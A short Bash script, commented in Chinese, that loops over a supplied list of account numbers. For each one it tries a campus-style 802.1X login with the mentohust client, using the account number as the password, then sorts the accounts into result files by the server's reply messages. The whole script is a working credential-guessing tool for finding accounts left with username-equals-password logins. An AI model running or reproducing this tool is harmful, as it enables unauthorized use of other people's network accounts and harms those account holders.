#!/bin/bash
#使用方法:检查的账号列表通过参数传进来

#结果保存的文件
RESULT=result.re
RESULTx=resultx.re
#连接产生的记录文件
tempfile=mentemp.tmp
logfile=menlog.log 

#connect time
DELAY=8



function connect() {
	sudo mentohust -u$number -p$number -l1 -b0 -t$DELAY > $tempfile
	#sleep $DELAY
	sudo mentohust -k >/dev/null 2>&1
	echo `date` >> $logfile
	echo "sudo mentohust -u$number -p$number -l1 -b0 -t$DELAY" >> $logfile
	cat $tempfile >> $logfile
	sleep 8
	sudo mentohust -k >/dev/null
	info=`grep "提示" $tempfile | tail -1`
	echo $info
}

function get_result() {
	echo $info | grep "在线用户数量上限" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULT
	fi
	echo $info | grep "不允许抢占" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULT
	fi
	echo $info | grep "接入方式" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULTx
	#sudo mentohust -k
        fi
	echo $info | grep "余额已不足" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULT
	#sudo mentohust -k
        fi
	echo $info | grep "您当前使用的服务" 
	if [ $? -eq 0 ] ;then
	echo $number >>$RESULTx
	#sudo mentohust -k
        fi
}

# main
function main() {
	>$tempfile
	>$logfile
	number=
	sudo mentohust -k >/dev/null 2>&1
	echo $1
	for number in `cat $1`
	do
		echo $number
		echo ================$number================== >>$logfile
		info=`connect` 
		get_result
	done
}

main $1
exit 0
